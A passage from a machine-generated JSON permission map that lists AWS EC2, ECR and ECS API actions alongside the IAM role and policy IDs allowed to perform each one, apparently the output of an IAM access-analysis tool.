null}}}}}}}},"ec2:DescribeRouteTables": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeSecurityGroups": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ec2:DescribeSnapshots": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ec2:DescribeSpotInstanceRequests": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}}}}},"ec2:DescribeSpotPriceHistory": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeSubnets": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeTags": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeVolumeStatus": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}}}}},"ec2:DescribeVolumes": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}},"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ec2:DescribeVpcAttribute": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeVpcEndpointServices": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeVpcEndpoints": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeVpcs": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ec2:DescribeVpnConnections": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ec2:DescribeVpnGateways": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ec2:DetachNetworkInterface": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DetachVolume": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}}}}},"ec2:ModifyImageAttribute": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:ModifyInstanceAttribute": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}}}}},"ec2:RequestSpotInstances": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:RevokeSecurityGroupEgress": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:RunInstances": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:TerminateInstances": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}}}}},"ec2:acceptReservedInstancesExchangeQuote": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:cancelReservedInstancesListing": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:createReservedInstancesListing": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeAccountAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeAddresses": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeAvailabilityZones": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeBundleTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeByoipCidrs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeCapacityReservations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeClassicLinkInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeClientVpnAuthorizationRules": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeClientVpnConnections": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeClientVpnEndpoints": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeClientVpnRoutes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeClientVpnTargetNetworks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeCoipPools": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeConversionTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeCustomerGateways": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeDhcpOptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeElasticGpus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeExportImageTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeExportTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeFastSnapshotRestores": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeFleetHistory": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeFleetInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeFleets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeFlowLogs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeHostReservationOfferings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeHostReservations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeHosts": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeIdFormat": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeIdentityIdFormat": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeImageAttribute": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeImages": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeImportImageTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeImportSnapshotTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeInstanceAttribute": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeInstanceStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeInternetGateways": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeKeyPairs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeLaunchTemplateVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeLaunchTemplates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeLocalGatewayRouteTableVirtualInterfaceGroupAssociations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeLocalGatewayRouteTableVpcAssociations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeLocalGatewayRouteTables": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeLocalGatewayVirtualInterfaceGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeLocalGatewayVirtualInterfaces": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeLocalGateways": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeMovingAddresses": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeNatGateways": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeNetworkAcls": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeNetworkInterfaceAttribute": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeNetworkInterfaces": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describePlacementGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describePrefixLists": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describePublicIpv4Pools": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeRegions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeReservedInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeReservedInstancesListings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeReservedInstancesModifications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeReservedInstancesOfferings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeRouteTables": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeScheduledInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeSecurityGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeSnapshotAttribute": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeSnapshots": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeSpotDatafeedSubscription": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeSpotFleetInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeSpotFleetRequestHistory": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeSpotFleetRequests": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeSpotInstanceRequests": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeSpotPriceHistory": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeSubnets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeTrafficMirrorFilters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeTrafficMirrorSessions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeTrafficMirrorTargets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeTransitGatewayAttachments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeTransitGatewayRouteTables": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeTransitGatewayVpcAttachments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeTransitGateways": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVolumeAttribute": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVolumeStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVolumes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVolumesModifications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVpcAttribute": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVpcClassicLink": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVpcClassicLinkDnsSupport": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVpcEndpointConnectionNotifications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVpcEndpointConnections": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVpcEndpointServiceConfigurations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVpcEndpointServicePermissions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVpcEndpointServices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVpcEndpoints": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVpcPeeringConnections": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVpcs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVpnConnections": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:describeVpnGateways": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:getCoipPoolUsage": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:getConsoleScreenshot": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:getReservedInstancesExchangeQuote": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:getTransitGatewayAttachmentPropagations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:getTransitGatewayRouteTableAssociations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:getTransitGatewayRouteTablePropagations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:modifyReservedInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:purchaseReservedInstancesOffering": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:searchLocalGatewayRoutes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecr:batchCheckLayerAvailability": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecr:describeImages": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecr:describeRepositories": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecr:getRepositoryPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecr:listImages": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecs:describeClusters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecs:describeContainerInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecs:describeServices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecs:describeTaskDefinition": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecs:describeTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecs:listClusters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecs:listContainerInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": 